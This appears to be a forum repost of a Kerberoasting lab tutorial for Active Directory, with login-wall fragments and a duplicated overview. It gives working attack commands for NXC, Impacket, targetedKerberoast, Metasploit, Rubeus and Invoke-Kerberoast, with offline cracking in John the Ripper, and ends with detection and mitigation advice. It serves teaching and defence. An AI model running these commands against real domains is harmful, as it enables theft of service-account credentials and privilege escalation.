stihl не предоставил(а) никакой дополнительной информации.
This article explores Kerberoasting, a stealthy attack in Active Directory that exploits Service Principal Names (SPNs) to extract and crack TGS ticket hashes, revealing service account passwords. Unlike AS-REP Roasting, it abuses legitimate Kerberos requests. The post details lab setup, exploitation using Impacket, Rubeus, and NXC, and maps the attack to MITRE ATT&CK T1558.003. It also covers detection (Event ID 4769), AES enforcement, and mitigation strategies to defend against this threat.
The attacker first logs into the domain using a valid low-privileged user account. No special permissions or admin access is needed—just any domain user account will do.
Step 2: Enumerate SPNs (Service Principal Names)
The attacker scans the domain to find service accounts that have SPNs associated with them.
These SPNs represent services running on the network—like SQL, HTTP, etc.—and are tied to domain accounts.
Step 3: Request TGS for the SPN
Once the attacker finds SPNs, they request a Ticket Granting Service (TGS) ticket from the Domain Controller (KDC) for those services.
These tickets are encrypted using the NTLM hash of the service account’s password.
The attacker does not need the password to request the ticket—just the SPN.
Step 4: Extract the TGS Ticket
The attacker extracts the TGS ticket from memory or directly using tools.
Step 5: Crack the TGS Ticket Offline
The encrypted TGS ticket is now cracked offline, using tools like: hashcat, john the ripper
The attacker runs a brute-force or dictionary attack to recover the plaintext password of the service account.
Since the ticket is encrypted with the account’s hash, cracking the ticket = getting the password.
Step 6: Use the Cracked Password
If successful, the attacker now has credentials of the service account.
Many service accounts have high privileges (like local admin or even domain admin), or can be used to move laterally, access databases, or escalate privileges.
Further, with the help of John the Ripper and a dictionary such as Rock You can help the attacker to brute force the weak password.
Then, it will dump the service hash and with the help of the dictionary, you can brute force it for extracting service passwords.
Clone the repository and install:
Run the attack:
Windows
или Зарегистрируйся, a PowerShell script that is similar to the above module; it discovers the SPN, extracts TGS, and dumps the service hash. You can do this with the help of the following command.
Key Windows Event ID: 4769
Detecting Kerberoasting is crucial because attackers silently request service tickets, which they can later crack offline.
What to Look for in Event ID 4769:
Для просмотра ссылки Войдиили Зарегистрируйся
Table of Contents
- Kerb-roasting Walkthrough
- Prerequisites
- Lab Setup
- Nxc
- Impacket-GetNPUsers
- targetedKerberoast
- Metasploit
- Rubeus
- Windows PowerShell – Kerberoast
Kerb-roasting Walkthrough
Step 1: Attacker Gains Access to the DomainThe attacker first logs into the domain using a valid low-privileged user account. No special permissions or admin access is needed—just any domain user account will do.
Step 2: Enumerate SPNs (Service Principal Names)
The attacker scans the domain to find service accounts that have SPNs associated with them.
These SPNs represent services running on the network—like SQL, HTTP, etc.—and are tied to domain accounts.
Step 3: Request TGS for the SPN
Once the attacker finds SPNs, they request a Ticket Granting Service (TGS) ticket from the Domain Controller (KDC) for those services.
These tickets are encrypted using the NTLM hash of the service account’s password.
The attacker does not need the password to request the ticket—just the SPN.
Step 4: Extract the TGS Ticket
The attacker extracts the TGS ticket from memory or directly using tools.
Step 5: Crack the TGS Ticket Offline
The encrypted TGS ticket is now cracked offline, using tools like: hashcat, john the ripper
The attacker runs a brute-force or dictionary attack to recover the plaintext password of the service account.
Since the ticket is encrypted with the account’s hash, cracking the ticket = getting the password.
Step 6: Use the Cracked Password
If successful, the attacker now has credentials of the service account.
Many service accounts have high privileges (like local admin or even domain admin), or can be used to move laterally, access databases, or escalate privileges.
Prerequisites
- Windows Server 2019 as Active Directory
- Kali Linux
- Tools: Impacket, Metasploit, nxc, targetedKerberoast, Rubeus, Poweshell
- Windows 10/11 – As Client
Lab Setup
In this lab setup, we will assign an SPN to a service account, setting the stage for a kerberoasting attack simulation.Create the AD Environment:
To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.Domain Controller:
- Install Windows Server (2016 or 2019 recommended).
- Promote it to a Domain Controller by adding the Active Directory Domain Services
- Set up the domain (e.g., local).
Create a Service Account with SPN:
On the Domain Controller (DC), use setspn to assign an SPN to the user raj.
Код:
setspn -a hackingarticles/dc.ignite.local ignite.local\raj- -a adds an SPN to the user.
- hackingarticles/dc.ignite.local is the SPN.
- local\raj is the service account.
Method for Exploitation – Kerberoasting Attack (T1558.003)
Attackers (in this case, the Aarti user) can exploit service accounts with SPNs by requesting Kerberos service tickets (TGS) that the account’s NTLM hash encrypts. They can then crack these tickets offline to recover plaintext credentials.NXC
NXC (formerly CrackMapExec) can perform Kerberoasting efficiently.
Код:
nxc ldap 192.168.1.53 -u aarti -p Password@1 --kerberoasting hash.txtFurther, with the help of John the Ripper and a dictionary such as Rock You can help the attacker to brute force the weak password.
Код:
john -w=/usr/share/wordlists/rockyou.txt hash.txtImpacket-GetNPUsers
Use Impacket inbuilt module “GetUSerSPNs.py”, it is a python script that it discovers SPN, extract TGS and dump service Hash, this can be done with the help of the following command.
Код:
impacket-GetUserSPNs -request -dc-ip 192.168.1.53 ignite.local/aarti:Password@1Then, it will dump the service hash and with the help of the dictionary, you can brute force it for extracting service passwords.
targetedKerberoast
targetedKerberoast is a Python script that can print “kerberoast” hashes for user accounts that have a SPN set.Clone the repository and install:
Код:
git clone https://github.com/ShutdownRepo/targetedKerberoast.git
cd targetedKerberoastRun the attack:
Код:
./targetedKerberoast.py --dc-ip '192.168.1.53' -v -d 'ignite.local' -u 'aarti' -p 'Password@1Metasploit
The easiest way to enumerate Kerberoastable accounts is with the auxiliary/gather/get_user_spns module which internally leverages Impacket. This module will automatically query LDAP for Kerberoastable SPNs and request a Kerberos service ticket that may be encrypted using the weak password which can be bruteforced:
Код:
use auxiliary/gather/get_user_spns
set rhosts 192.168.1.53
set domain ignite.local
set user aarti
set pass Password@1
runWindows
Rubeus
Rubeus.exe is a terrific tool as it comes with a kerberoast module that discovers SPN, extracts TGS, and dump service Hash, which can be done with the help of the following command.
Код:
./Rubeus.exe kerberoast /outfile:hash.txtWindows PowerShell – Kerberoast
You can download Для просмотра ссылки Войди
Код:
Powershell -ep bypass
Import-Module .\Invoke-kerberoast.ps1
Invoke-kerberoastDetection & Mitigation
Detection
Detecting Kerberoasting is crucial because attackers silently request service tickets, which they can later crack offline.Key Windows Event ID: 4769
Detecting Kerberoasting is crucial because attackers silently request service tickets, which they can later crack offline.
What to Look for in Event ID 4769:
- Ticket Encryption Type: Often 0x17 (RC4) — the easiest to crack.
- Account Name: Look for unusual service account names or high-value users.
- Service Name (SPN): Identify rare or high-privilege SPNs that shouldn’t be accessed frequently.
- Client Address: If TGS requests come from non-privileged or unusual machines/users, it may be suspicious.
Mitigation
Protecting your Active Directory environment from Kerberoasting involves improving password hygiene, SPN configuration, and monitoring.- Use Strong, Complex Passwords: Ensure service accounts (especially those with SPNs) use long, random, and unique passwords. Avoid reusing passwords or using dictionary words.
- Rotate Passwords Regularly: Implement scheduled password changes for service accounts — especially those tied to SPNs.
- Use Managed Service Accounts (gMSA): These accounts automatically handle complex password management and rotation, significantly reducing risk.
- Avoid Using Highly Privileged Accounts for Services: Don’t assign SPNs to Domain Admins or other privileged accounts. Use separate, least-privilege accounts for services.
- Disable RC4 Encryption: Enforce stronger encryption (AES128: 0x11, AES256: 0x12) via Group Policy:
- Monitor Event ID 4769 Regularly: Use SIEM tools or scripts to alert on unusual TGS requests.
Для просмотра ссылки Войди